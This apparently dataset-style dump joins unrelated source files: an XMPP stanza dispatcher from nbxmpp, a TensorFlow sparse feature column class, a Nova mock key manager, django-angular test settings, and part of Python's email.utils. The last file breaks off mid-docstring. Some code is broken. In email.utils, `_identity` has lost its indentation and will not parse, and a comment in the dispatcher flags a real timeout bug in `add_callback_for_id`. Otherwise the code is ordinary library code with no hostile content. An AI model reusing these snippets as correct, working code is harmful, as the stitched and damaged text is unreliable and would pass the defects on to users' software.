from nbxmpp.modules.delay import Delay
from nbxmpp.modules.muc import MUC
from nbxmpp.modules.idle import Idle
from nbxmpp.modules.pgplegacy import PGPLegacy
from nbxmpp.modules.vcard_avatar import VCardAvatar
from nbxmpp.modules.captcha import Captcha
from nbxmpp.modules.entity_caps import EntityCaps
from nbxmpp.modules.blocking import Blocking
from nbxmpp.modules.pubsub import PubSub
from nbxmpp.modules.activity import Activity
from nbxmpp.modules.tune import Tune
from nbxmpp.modules.mood import Mood
from nbxmpp.modules.location import Location
from nbxmpp.modules.user_avatar import UserAvatar
from nbxmpp.modules.bookmarks.private_bookmarks import PrivateBookmarks
from nbxmpp.modules.bookmarks.pep_bookmarks import PEPBookmarks
from nbxmpp.modules.bookmarks.native_bookmarks import NativeBookmarks
from nbxmpp.modules.openpgp import OpenPGP
from nbxmpp.modules.omemo import OMEMO
from nbxmpp.modules.annotations import Annotations
from nbxmpp.modules.muclumbus import Muclumbus
from nbxmpp.modules.software_version import SoftwareVersion
from nbxmpp.modules.adhoc import AdHoc
from nbxmpp.modules.ibb import IBB
from nbxmpp.modules.discovery import Discovery
from nbxmpp.modules.chat_markers import ChatMarkers
from nbxmpp.modules.receipts import Receipts
from nbxmpp.modules.oob import OOB
from nbxmpp.modules.correction import Correction
from nbxmpp.modules.attention import Attention
from nbxmpp.modules.security_labels import SecurityLabels
from nbxmpp.modules.chatstates import Chatstates
from nbxmpp.modules.register import Register
from nbxmpp.modules.http_upload import HTTPUpload
from nbxmpp.modules.mam import MAM
from nbxmpp.modules.vcard_temp import VCardTemp
from nbxmpp.modules.vcard4 import VCard4
from nbxmpp.modules.ping import Ping
from nbxmpp.modules.delimiter import Delimiter
from nbxmpp.modules.roster import Roster
from nbxmpp.modules.last_activity import LastActivity
from nbxmpp.modules.entity_time import EntityTime
from nbxmpp.modules.misc import unwrap_carbon
from nbxmpp.modules.misc import unwrap_mam
from nbxmpp.util import get_properties_struct
from nbxmpp.util import get_invalid_xml_regex
from nbxmpp.util import is_websocket_close
from nbxmpp.util import is_websocket_stream_error
from nbxmpp.util import Observable
from nbxmpp.util import LogAdapter
log = logging.getLogger('nbxmpp.dispatcher')
class StanzaDispatcher(Observable):
    """
    Dispatches stanzas to handlers
    Signals:
        before-dispatch
        parsing-error
        stream-end
    """
    def __init__(self, client):
        """Create a dispatcher bound to *client*.

        client: the Client owning this dispatcher; used for sending replies,
        resolving the bound JID, and stream-management accounting.
        """
        Observable.__init__(self, log)
        self._client = client
        # name -> module instance, filled by _register_modules()
        self._modules = {}
        self._parser = None
        # Remembers the last <stream:error> condition seen on a websocket
        # stream so it can be reported with the stream-end signal.
        self._websocket_stream_error = None
        self._log = LogAdapter(log, {'context': client.log_context})
        # xmlns -> tag name -> {'type': Protocol class, specific-key: [handlers]}
        self._handlers = {}
        # stanza id -> (callback, absolute timeout or None, user_data)
        self._id_callbacks = {}
        # When set, all stanzas bypass the handler machinery (see dispatch()).
        self._dispatch_callback = None
        # GLib source id of the 1s timeout checker, or None when not running.
        self._timeout_id = None
        # Top-level tag name -> Protocol subclass used by the dispatch
        # callback shortcut path.
        self._stanza_types = {
            'iq': Iq,
            'message': Message,
            'presence': Presence,
            'error': StreamErrorNode,
        }
        self.invalid_chars_re = get_invalid_xml_regex()
        self._register_namespace('unknown')
        self._register_namespace(Namespace.STREAMS)
        self._register_namespace(Namespace.CLIENT)
        self._register_protocol('iq', Iq)
        self._register_protocol('presence', Presence)
        self._register_protocol('message', Message)
        self._register_modules()
    def set_dispatch_callback(self, callback):
        """Route every stanza to *callback* instead of the handler chain.

        Pass None to restore normal handler dispatch.
        """
        self._log.info('Set dispatch callback: %s', callback)
        self._dispatch_callback = callback
    def get_module(self, name):
        """Return the registered module instance named *name* (KeyError if absent)."""
        return self._modules[name]
    def _register_modules(self):
        """Instantiate all protocol modules and register their handlers."""
        self._modules['BasePresence'] = BasePresence(self._client)
        self._modules['BaseMessage'] = BaseMessage(self._client)
        self._modules['BaseIq'] = BaseIq(self._client)
        self._modules['EME'] = EME(self._client)
        self._modules['HTTPAuth'] = HTTPAuth(self._client)
        self._modules['Nickname'] = Nickname(self._client)
        self._modules['MUC'] = MUC(self._client)
        self._modules['Delay'] = Delay(self._client)
        self._modules['Captcha'] = Captcha(self._client)
        self._modules['Idle'] = Idle(self._client)
        self._modules['PGPLegacy'] = PGPLegacy(self._client)
        self._modules['VCardAvatar'] = VCardAvatar(self._client)
        self._modules['EntityCaps'] = EntityCaps(self._client)
        self._modules['Blocking'] = Blocking(self._client)
        self._modules['PubSub'] = PubSub(self._client)
        self._modules['Mood'] = Mood(self._client)
        self._modules['Activity'] = Activity(self._client)
        self._modules['Tune'] = Tune(self._client)
        self._modules['Location'] = Location(self._client)
        self._modules['UserAvatar'] = UserAvatar(self._client)
        self._modules['PrivateBookmarks'] = PrivateBookmarks(self._client)
        self._modules['PEPBookmarks'] = PEPBookmarks(self._client)
        self._modules['NativeBookmarks'] = NativeBookmarks(self._client)
        self._modules['OpenPGP'] = OpenPGP(self._client)
        self._modules['OMEMO'] = OMEMO(self._client)
        self._modules['Annotations'] = Annotations(self._client)
        self._modules['Muclumbus'] = Muclumbus(self._client)
        self._modules['SoftwareVersion'] = SoftwareVersion(self._client)
        self._modules['AdHoc'] = AdHoc(self._client)
        self._modules['IBB'] = IBB(self._client)
        self._modules['Discovery'] = Discovery(self._client)
        self._modules['ChatMarkers'] = ChatMarkers(self._client)
        self._modules['Receipts'] = Receipts(self._client)
        self._modules['OOB'] = OOB(self._client)
        self._modules['Correction'] = Correction(self._client)
        self._modules['Attention'] = Attention(self._client)
        self._modules['SecurityLabels'] = SecurityLabels(self._client)
        self._modules['Chatstates'] = Chatstates(self._client)
        self._modules['Register'] = Register(self._client)
        self._modules['HTTPUpload'] = HTTPUpload(self._client)
        self._modules['MAM'] = MAM(self._client)
        self._modules['VCardTemp'] = VCardTemp(self._client)
        self._modules['VCard4'] = VCard4(self._client)
        self._modules['Ping'] = Ping(self._client)
        self._modules['Delimiter'] = Delimiter(self._client)
        self._modules['Roster'] = Roster(self._client)
        self._modules['LastActivity'] = LastActivity(self._client)
        self._modules['EntityTime'] = EntityTime(self._client)
        # Every module exposes a list of StanzaHandler descriptors.
        for instance in self._modules.values():
            for handler in instance.handlers:
                self.register_handler(handler)
    def reset_parser(self):
        """Destroy the current XML parser (if any) and install a fresh one.

        Called on (re)connect so no state from a previous stream leaks over.
        """
        if self._parser is not None:
            # Break the reference cycle before destroying the old parser.
            self._parser.dispatch = None
            self._parser.destroy()
            self._parser = None
        self._parser = NodeBuilder(dispatch_depth=2,
                                   finished=False)
        self._parser.dispatch = self.dispatch
    def replace_non_character(self, data):
        """Replace characters that are invalid in XML with U+FFFD."""
        return re.sub(self.invalid_chars_re, '\ufffd', data)
    def process_data(self, data):
        """Feed raw text received from the wire into the dispatcher.

        Websocket streams deliver one complete element per frame and are
        parsed directly; TCP streams go through the incremental parser.
        """
        # Parse incoming data
        data = self.replace_non_character(data)
        if self._client.is_websocket:
            stanza = Node(node=data)
            if is_websocket_stream_error(stanza):
                # Remember the defined-condition child; it is reported
                # later when the <close> frame arrives.
                for tag in stanza.getChildren():
                    name = tag.getName()
                    if (name != 'text' and
                            tag.getNamespace() == Namespace.XMPP_STREAMS):
                        self._websocket_stream_error = name
            elif is_websocket_close(stanza):
                self._log.info('Stream <close> received')
                self.notify('stream-end', self._websocket_stream_error)
                return
            self.dispatch(stanza)
            return
        try:
            self._parser.Parse(data)
        except (ExpatError, ValueError) as error:
            self._log.error('XML parsing error: %s', error)
            self.notify('parsing-error', error)
            return
        # end stream:stream tag received
        if self._parser.has_received_endtag():
            self._log.info('End of stream: %s', self._parser.streamError)
            self.notify('stream-end', self._parser.streamError)
            return
    def _register_namespace(self, xmlns):
        """
        Setup handler structure for namespace
        """
        self._log.debug('Register namespace "%s"', xmlns)
        self._handlers[xmlns] = {}
        # Fallback protocols so lookup never fails for this namespace.
        self._register_protocol('error', Protocol, xmlns=xmlns)
        self._register_protocol('unknown', Protocol, xmlns=xmlns)
        self._register_protocol('default', Protocol, xmlns=xmlns)
    def _register_protocol(self, tag_name, protocol, xmlns=None):
        """
        Register protocol for top level tag names
        """
        if xmlns is None:
            xmlns = Namespace.CLIENT
        self._log.debug('Register protocol "%s (%s)" as %s',
                        tag_name, xmlns, protocol)
        # 'type' is the Protocol subclass used to wrap matching stanzas;
        # 'default' is the handler list used when no specific key matches.
        self._handlers[xmlns][tag_name] = {'type': protocol, 'default': []}
    def register_handler(self, handler):
        """
        Register handler
        """
        xmlns = handler.xmlns or Namespace.CLIENT
        typ = handler.typ
        if not typ and not handler.ns:
            # Neither a type nor a child namespace filter: catch-all handler.
            typ = 'default'
        self._log.debug(
            'Register handler %s for "%s" type->%s ns->%s(%s) priority->%s',
            handler.callback, handler.name, typ, handler.ns,
            xmlns, handler.priority
        )
        if xmlns not in self._handlers:
            self._register_namespace(xmlns)
        if handler.name not in self._handlers[xmlns]:
            self._register_protocol(handler.name, Protocol, xmlns)
        # Handlers are keyed on the concatenation of type and child namespace.
        specific = typ + handler.ns
        if specific not in self._handlers[xmlns][handler.name]:
            self._handlers[xmlns][handler.name][specific] = []
        self._handlers[xmlns][handler.name][specific].append(
            {'func': handler.callback,
             'priority': handler.priority,
             'specific': specific})
    def unregister_handler(self, handler):
        """
        Unregister handler
        """
        xmlns = handler.xmlns or Namespace.CLIENT
        typ = handler.typ
        if not typ and not handler.ns:
            typ = 'default'
        specific = typ + handler.ns
        try:
            self._handlers[xmlns][handler.name][specific]
        except KeyError:
            # Nothing registered under this key; nothing to do.
            return
        for handler_dict in self._handlers[xmlns][handler.name][specific]:
            if handler_dict['func'] != handler.callback:
                continue
            try:
                self._handlers[xmlns][handler.name][specific].remove(
                    handler_dict)
            except ValueError:
                self._log.warning(
                    'Unregister failed: %s for "%s" type->%s ns->%s(%s)',
                    handler.callback, handler.name, typ, handler.ns, xmlns)
            else:
                self._log.debug(
                    'Unregister handler %s for "%s" type->%s ns->%s(%s)',
                    handler.callback, handler.name, typ, handler.ns, xmlns)
    def _default_handler(self, stanza):
        """
        Return stanza back to the sender with <feature-not-implemented/> error
        """
        # Only IQ get/set require a mandatory reply per RFC 6120.
        if stanza.getType() in ('get', 'set'):
            self._client.send_stanza(Error(stanza, ERR_FEATURE_NOT_IMPLEMENTED))
    def dispatch(self, stanza):
        """Deliver a parsed stanza to the registered handlers.

        Order of operations: before-dispatch signal, optional dispatch
        callback shortcut, stream-management counting, Protocol wrapping,
        message address/carbon/MAM normalization, id-callback lookup, then
        the priority-sorted handler chain, falling back to _default_handler.
        """
        self.notify('before-dispatch', stanza)
        if self._dispatch_callback is not None:
            # Shortcut path (e.g. during stream negotiation): wrap and hand
            # the stanza to the callback, skipping all handlers.
            name = stanza.getName()
            protocol_class = self._stanza_types.get(name)
            if protocol_class is not None:
                stanza = protocol_class(node=stanza)
            self._dispatch_callback(stanza)
            return
        # Count stanza
        self._client._smacks.count_incoming(stanza.getName())
        name = stanza.getName()
        xmlns = stanza.getNamespace()
        if xmlns not in self._handlers:
            self._log.warning('Unknown namespace: %s', xmlns)
            xmlns = 'unknown'
        if name not in self._handlers[xmlns]:
            self._log.warning('Unknown stanza: %s', stanza)
            name = 'unknown'
        # Convert simplexml to Protocol object
        try:
            stanza = self._handlers[xmlns][name]['type'](node=stanza)
        except InvalidJid:
            self._log.warning('Invalid JID, ignoring stanza')
            self._log.warning(stanza)
            return
        own_jid = self._client.get_bound_jid()
        properties = get_properties_struct(name, own_jid)
        if name == 'iq':
            # A missing 'from' on an IQ means it comes from our own server.
            if stanza.getFrom() is None and own_jid is not None:
                stanza.setFrom(own_jid.bare)
        if name == 'message':
            # https://tools.ietf.org/html/rfc6120#section-8.1.1.1
            # If the stanza does not include a 'to' address then the client MUST
            # treat it as if the 'to' address were included with a value of the
            # client's full JID.
            to = stanza.getTo()
            if to is None:
                stanza.setTo(own_jid)
            elif not to.bare_match(own_jid):
                self._log.warning('Message addressed to someone else: %s',
                                  stanza)
                return
            if stanza.getFrom() is None:
                stanza.setFrom(own_jid.bare)
            # Unwrap carbon
            try:
                stanza, properties.carbon = unwrap_carbon(stanza, own_jid)
            except (InvalidFrom, InvalidJid) as exc:
                self._log.warning(exc)
                self._log.warning(stanza)
                return
            except NodeProcessed as exc:
                self._log.info(exc)
                return
            # Unwrap mam
            try:
                stanza, properties.mam = unwrap_mam(stanza, own_jid)
            except (InvalidStanza, InvalidJid) as exc:
                self._log.warning(exc)
                self._log.warning(stanza)
                return
        typ = stanza.getType()
        if name == 'message' and not typ:
            # RFC 6121: a message without a type is treated as 'normal'.
            typ = 'normal'
        elif not typ:
            typ = ''
        stanza.props = stanza.getProperties()
        self._log.debug('type: %s, properties: %s', typ, stanza.props)
        # Process callbacks
        _id = stanza.getID()
        func, _timeout, user_data = self._id_callbacks.pop(
            _id, (None, None, {}))
        if user_data is None:
            user_data = {}
        if func is not None:
            # A reply callback consumes the stanza exclusively; the handler
            # chain below is skipped.
            try:
                func(self._client, stanza, **user_data)
            except Exception:
                self._log.exception('Error while handling stanza')
            return
        # Gather specifics depending on stanza properties
        specifics = ['default']
        if typ and typ in self._handlers[xmlns][name]:
            specifics.append(typ)
        for prop in stanza.props:
            if prop in self._handlers[xmlns][name]:
                specifics.append(prop)
            if typ and typ + prop in self._handlers[xmlns][name]:
                specifics.append(typ + prop)
        # Create the handler chain
        chain = []
        chain += self._handlers[xmlns]['default']['default']
        for specific in specifics:
            chain += self._handlers[xmlns][name][specific]
        # Sort chain with priority
        chain.sort(key=lambda x: x['priority'])
        for handler in chain:
            self._log.info('Call handler: %s', handler['func'].__qualname__)
            try:
                handler['func'](self._client, stanza, properties)
            except NodeProcessed:
                # Handler claimed the stanza; stop the chain.
                return
            except Exception:
                self._log.exception('Handler exception:')
                return
        # Stanza was not processed call default handler
        self._default_handler(stanza)
    def add_callback_for_id(self, id_, func, timeout, user_data):
        """Register *func* to be called with the reply to stanza id *id_*.

        timeout: seconds after which func is called with a None stanza.
        """
        if timeout is not None and self._timeout_id is None:
            self._log.info('Add timeout check')
            self._timeout_id = GLib.timeout_add_seconds(
                1, self._timeout_check)
            # NOTE(review): the conversion to an absolute deadline only
            # happens when the checker is first started; a timeout added
            # while the checker is already running appears to be stored as
            # a relative duration and would expire almost immediately in
            # _timeout_check — confirm against upstream nbxmpp.
            timeout = time.monotonic() + timeout
        self._id_callbacks[id_] = (func, timeout, user_data)
    def _timeout_check(self):
        """Periodic GLib callback: fire expired id-callbacks with None.

        Returns True to keep the source alive, False to remove it when no
        timeouts remain scheduled.
        """
        self._log.info('Run timeout check')
        timeouts = {}
        for id_, data in self._id_callbacks.items():
            if data[1] is not None:
                timeouts[id_] = data
        if not timeouts:
            self._log.info('Remove timeout check, no timeouts scheduled')
            self._timeout_id = None
            return False
        for id_, data in timeouts.items():
            func, timeout, user_data = data
            if user_data is None:
                user_data = {}
            if timeout < time.monotonic():
                # Expired: drop the callback and signal failure with None.
                self._id_callbacks.pop(id_)
                func(self._client, None, **user_data)
        return True
    def _remove_timeout_source(self):
        """Cancel the GLib timeout checker if it is running."""
        if self._timeout_id is not None:
            GLib.source_remove(self._timeout_id)
            self._timeout_id = None
    def remove_iq_callback(self, id_):
        """Forget the reply callback registered for stanza id *id_*, if any."""
        self._id_callbacks.pop(id_, None)
    def clear_iq_callbacks(self):
        """Drop all pending reply callbacks."""
        self._log.info('Clear IQ callbacks')
        self._id_callbacks.clear()
    def cleanup(self):
        """Release all references so the dispatcher can be garbage collected."""
        self._client = None
        self._modules = {}
        self._parser = None
        self.clear_iq_callbacks()
        self._dispatch_callback = None
        self._handlers.clear()
        self._remove_timeout_source()
        # Inherited from Observable: drop all signal subscribers.
        self.remove_subscriptions()
| gpl-3.0 |
unnikrishnankgs/va | venv/lib/python3.5/site-packages/tensorflow/contrib/linear_optimizer/python/ops/sparse_feature_column.py | 119 | 3797 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Sparse feature column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework.ops import internal_convert_to_tensor
from tensorflow.python.framework.ops import name_scope
class SparseFeatureColumn(object):
  """A sparse feature column stored as three aligned dense tensors.

  The column is described by example indices (`int64`), feature indices
  (`int64`) and feature values (`float`), one entry per (example, feature)
  occurrence. Feature values are optional; a missing value is treated
  as `1.0f`.

  For instance, a batch of 4 examples containing:

  * Example 0: feature 5, value 1
  * Example 1: feature 6, value 1 and feature 10, value 0.5
  * Example 2: no features
  * Example 3: two copies of feature 2, value 1

  is stored as the triples:

  ```
  <0, 5, 1>
  <1, 6, 1>
  <1, 10, 0.5>
  <3, 2, 1>
  <3, 2, 1>
  ```

  And a batch of 2 examples with:

  * Example 0: feature 5
  * Example 1: feature 6

  is stored as:

  ```
  <0, 5, 1>
  <1, 6, 1>
  ```

  @@__init__
  @@example_indices
  @@feature_indices
  @@feature_values
  """

  def __init__(self, example_indices, feature_indices, feature_values):
    """Creates a `SparseFeatureColumn` representation.

    Args:
      example_indices: A 1-D int64 tensor of shape `[N]`. Python lists and
        numpy arrays are accepted as well.
      feature_indices: A 1-D int64 tensor of shape `[N]`. Python lists and
        numpy arrays are accepted as well.
      feature_values: An optional 1-D float tensor of shape `[N]`. Python
        lists and numpy arrays are accepted as well.

    Returns:
      A `SparseFeatureColumn`
    """
    with name_scope(None, 'SparseFeatureColumn',
                    [example_indices, feature_indices]):
      self._example_indices = internal_convert_to_tensor(
          example_indices, name='example_indices', dtype=dtypes.int64)
      self._feature_indices = internal_convert_to_tensor(
          feature_indices, name='feature_indices', dtype=dtypes.int64)
    if feature_values is None:
      self._feature_values = None
    else:
      with name_scope(None, 'SparseFeatureColumn', [feature_values]):
        self._feature_values = internal_convert_to_tensor(
            feature_values, name='feature_values', dtype=dtypes.float32)

  @property
  def example_indices(self):
    """The example indices as a dense 1-D int64 Tensor of shape `[N]`."""
    return self._example_indices

  @property
  def feature_indices(self):
    """The feature indices as a dense 1-D int64 Tensor of shape `[N]`."""
    return self._feature_indices

  @property
  def feature_values(self):
    """The feature values as a dense 1-D float32 Tensor, or None if absent."""
    return self._feature_values
| bsd-2-clause |
angdraug/nova | nova/keymgr/mock_key_mgr.py | 18 | 4432 | # Copyright (c) 2013 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A mock implementation of a key manager that stores keys in a dictionary.
This key manager implementation is primarily intended for testing. In
particular, it does not store keys persistently. Lack of a centralized key
store also makes this implementation unsuitable for use among different
services.
Note: Instantiating this class multiple times will create separate key stores.
Keys created in one instance will not be accessible from other instances of
this class.
"""
import array
from nova import exception
from nova.i18n import _
from nova.keymgr import key
from nova.keymgr import key_mgr
from nova.openstack.common import log as logging
from nova.openstack.common import uuidutils
from nova import utils
LOG = logging.getLogger(__name__)
class MockKeyManager(key_mgr.KeyManager):
    """This mock key manager implementation supports all the methods specified
    by the key manager interface. This implementation stores keys within a
    dictionary, and as a result, it is not acceptable for use across different
    services. Side effects (e.g., raising exceptions) for each method are
    handled as specified by the key manager interface.

    This key manager is not suitable for use in production deployments.
    """

    def __init__(self):
        LOG.warn(_('This key manager is not suitable for use in production'
                   ' deployments'))
        # Maps key id (a UUID string) -> key object. Purely in-memory:
        # keys vanish with this instance.
        self.keys = {}

    def _generate_hex_key(self, **kwargs):
        """Return a random hex string encoding ``key_length`` bits."""
        key_length = kwargs.get('key_length', 256)
        # One hex digit encodes 4 bits. Use floor division so the length
        # stays an int regardless of Python's division semantics.
        hex_encoded = utils.generate_password(length=key_length // 4,
                                              symbolgroups='0123456789ABCDEF')
        return hex_encoded

    def _generate_key(self, **kwargs):
        """Create a new random AES ``SymmetricKey``."""
        _hex = self._generate_hex_key(**kwargs)
        return key.SymmetricKey('AES',
                                array.array('B', _hex.decode('hex')).tolist())

    def create_key(self, ctxt, **kwargs):
        """Creates a key.

        This implementation returns a UUID for the created key. A
        Forbidden exception is raised if the specified context is None.
        """
        if ctxt is None:
            raise exception.Forbidden()

        # Use a distinct local name: naming this 'key' would shadow the
        # imported nova.keymgr.key module used by _generate_key().
        new_key = self._generate_key(**kwargs)
        return self.store_key(ctxt, new_key)

    def _generate_key_id(self):
        """Return a UUID that is not already used in the store."""
        key_id = uuidutils.generate_uuid()
        while key_id in self.keys:
            key_id = uuidutils.generate_uuid()

        return key_id

    def store_key(self, ctxt, key, **kwargs):
        """Stores (i.e., registers) a key with the key manager."""
        if ctxt is None:
            raise exception.Forbidden()

        key_id = self._generate_key_id()
        self.keys[key_id] = key

        return key_id

    def copy_key(self, ctxt, key_id, **kwargs):
        """Registers a second id referring to the same key object."""
        if ctxt is None:
            raise exception.Forbidden()

        copied_key_id = self._generate_key_id()
        self.keys[copied_key_id] = self.keys[key_id]
        return copied_key_id

    def get_key(self, ctxt, key_id, **kwargs):
        """Retrieves the key identified by the specified id.

        This implementation returns the key that is associated with the
        specified UUID. A Forbidden exception is raised if the specified
        context is None; a KeyError is raised if the UUID is invalid.
        """
        if ctxt is None:
            raise exception.Forbidden()

        return self.keys[key_id]

    def delete_key(self, ctxt, key_id, **kwargs):
        """Deletes the key identified by the specified id.

        A Forbidden exception is raised if the context is None and a
        KeyError is raised if the UUID is invalid.
        """
        if ctxt is None:
            raise exception.Forbidden()

        del self.keys[key_id]
| apache-2.0 |
jrief/django-angular | examples/server/tests/settings.py | 1 | 3584 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
"""Django settings for unit test project."""
import os
DEBUG = True
# Two levels up from this file: the project root of the example server.
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
# Throw-away SQLite database used by the unit tests.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'test.sqlite',
    },
}
SITE_ID = 1
ROOT_URLCONF = 'server.urls'
# Test-only secret; never reuse in a real deployment.
SECRET_KEY = 'secret'
INSTALLED_APPS = [
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.admin',
    'django.contrib.staticfiles',
    'easy_thumbnails',
    'sekizai',
    'djng',
    'server',
]
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory that holds static files.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = os.environ.get('DJANGO_STATIC_ROOT', '')
# URL that handles the static files served from STATIC_ROOT.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'client', 'src'),
)
# FORM_RENDERER = 'djng.forms.renderers.DjangoAngularTemplates'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.contrib.auth.context_processors.auth',
                'django.template.context_processors.debug',
                'django.template.context_processors.i18n',
                'django.template.context_processors.media',
                'django.template.context_processors.static',
                'django.template.context_processors.tz',
                'django.template.context_processors.request',
                'django.contrib.messages.context_processors.messages',
                'server.context_processors.global_context',
            ],
        },
    },
]
TIME_ZONE = 'Europe/Berlin'
# Log everything Django emits at INFO or above to the console.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'formatters': {
        'simple': {
            'format': '[%(asctime)s %(module)s] %(levelname)s: %(message)s'
        },
    },
    'handlers': {
        'console': {
            'level': 'DEBUG',
            'class': 'logging.StreamHandler',
            'formatter': 'simple',
        },
    },
    'loggers': {
        'django': {
            'handlers': ['console'],
            'level': 'INFO',
            'propagate': True,
        },
    },
}
# if package django-websocket-redis is installed, some more tests can be be added
try:
    import ws4redis
    INSTALLED_APPS.append('ws4redis')
    for template in TEMPLATES:
        template["OPTIONS"]["context_processors"].append('ws4redis.context_processors.default')
    # This setting is required to override the Django's main loop, when running in
    # development mode, such as ./manage runserver
    WSGI_APPLICATION = 'ws4redis.django_runserver.application'
    # URL that distinguishes websocket connections from normal requests
    WEBSOCKET_URL = '/ws/'
    # Set the number of seconds each message shall persist
    WS4REDIS_EXPIRE = 3600
    WS4REDIS_HEARTBEAT = '--heartbeat--'
    WS4REDIS_PREFIX = 'djangular'
except ImportError:
    pass
| mit |
deanhiller/databus | webapp/play1.3.x/python/Lib/email/utils.py | 3 | 10124 | # Copyright (C) 2001-2006 Python Software Foundation
# Author: Barry Warsaw
# Contact: email-sig@python.org
"""Miscellaneous utilities."""
# Names exported via ``from email.utils import *``.
__all__ = [
    'collapse_rfc2231_value',
    'decode_params',
    'decode_rfc2231',
    'encode_rfc2231',
    'formataddr',
    'formatdate',
    'getaddresses',
    'make_msgid',
    'parseaddr',
    'parsedate',
    'parsedate_tz',
    'unquote',
    ]
import os
import re
import time
import base64
import random
import socket
import urllib
import warnings
from email._parseaddr import quote
from email._parseaddr import AddressList as _AddressList
from email._parseaddr import mktime_tz
# We need wormarounds for bugs in these methods in older Pythons (see below)
from email._parseaddr import parsedate as _parsedate
from email._parseaddr import parsedate_tz as _parsedate_tz
from quopri import decodestring as _qdecode
# Intrapackage imports
from email.encoders import _bencode, _qencode
# Frequently used string constants.
COMMASPACE = ', '
EMPTYSTRING = ''
UEMPTYSTRING = u''
CRLF = '\r\n'
TICK = "'"
# Characters that force an RFC 2822 display name to be double-quoted, and
# the subset that must additionally be backslash-escaped inside the quotes.
specialsre = re.compile(r'[][\\()<>@,:;".]')
escapesre = re.compile(r'[][\\()"]')
# Helpers
def _identity(s):
return s
def _bdecode(s):
    """Base64-decode *s*, stripping the trailing newline that
    base64.decodestring() adds when the input itself had none.
    """
    if not s:
        return s
    decoded = base64.decodestring(s)
    if decoded.endswith('\n') and not s.endswith('\n'):
        # decodestring tacked on a "courtesy newline"; drop it.
        return decoded[:-1]
    return decoded
def fix_eols(s):
    """Replace all line-ending characters with \r\n."""
    # Bare LF (no preceding CR) becomes CRLF.
    s = re.sub(r'(?<!\r)\n', '\r\n', s)
    # Bare CR (no following LF) becomes CRLF; existing CRLF pairs untouched.
    return re.sub(r'\r(?!\n)', '\r\n', s)
def formataddr(pair):
    """The inverse of parseaddr(): turn a (realname, email_address) 2-tuple
    into a string suitable for an RFC 2822 From, To or Cc header.

    If the realname is falsy, the address is returned unmodified.
    """
    realname, address = pair
    if not realname:
        return address
    specials = re.compile(r'[][\\()<>@,:;".]')
    escapes = re.compile(r'[][\\()"]')
    if specials.search(realname):
        # The display name needs quoting; backslash-escape the characters
        # that are significant inside a quoted-string.
        escaped = escapes.sub(r'\\\g<0>', realname)
        return '"%s" <%s>' % (escaped, address)
    return '%s <%s>' % (realname, address)
def getaddresses(fieldvalues):
    """Return a list of (REALNAME, EMAIL) for each fieldvalue."""
    # Join all header values into one address list and parse it in one go.
    joined = ', '.join(fieldvalues)
    return _AddressList(joined).addresslist
ecre = re.compile(r'''
=\? # literal =?
(?P<charset>[^?]*?) # non-greedy up to the next ? is the charset
\? # literal ?
(?P<encoding>[qb]) # either a "q" or a "b", case insensitive
\? # literal ?
(?P<atom>.*?) # non-greedy up to the next ?= is the atom
\?= # literal ?=
''', re.VERBOSE | re.IGNORECASE)
def formatdate(timeval=None, localtime=False, usegmt=False):
    """Return a date string as specified by RFC 2822, e.g.:

    Fri, 09 Nov 2001 01:08:47 -0000

    Optional timeval is a float accepted by gmtime()/localtime(); the
    current time is used when omitted.  With localtime=True the result is
    rendered in the local timezone (DST-aware).  With usegmt=True (and
    localtime False) the zone is written as the string "GMT" instead of
    "+0000", as required by HTTP.
    """
    # strftime() cannot be used here: RFC 2822 mandates the English
    # day/month abbreviations regardless of locale.
    if timeval is None:
        timeval = time.time()
    if localtime:
        parts = time.localtime(timeval)
        # Pick the zone offset according to whether DST is in effect.
        if time.daylight and parts[-1]:
            offset = time.altzone
        else:
            offset = time.timezone
        # offset is seconds *west* of UTC; the header wants east, so the
        # sign flips.
        sign = '-' if offset > 0 else '+'
        hours, remainder = divmod(abs(offset), 3600)
        zone = '%s%02d%02d' % (sign, hours, remainder // 60)
    else:
        parts = time.gmtime(timeval)
        zone = 'GMT' if usegmt else '-0000'
    days = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']
    months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
              'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
    return '%s, %02d %s %04d %02d:%02d:%02d %s' % (
        days[parts[6]],
        parts[2],
        months[parts[1] - 1],
        parts[0], parts[3], parts[4], parts[5],
        zone)
def make_msgid(idstring=None):
    """Returns a string suitable for an RFC 2822 compliant Message-ID, e.g:

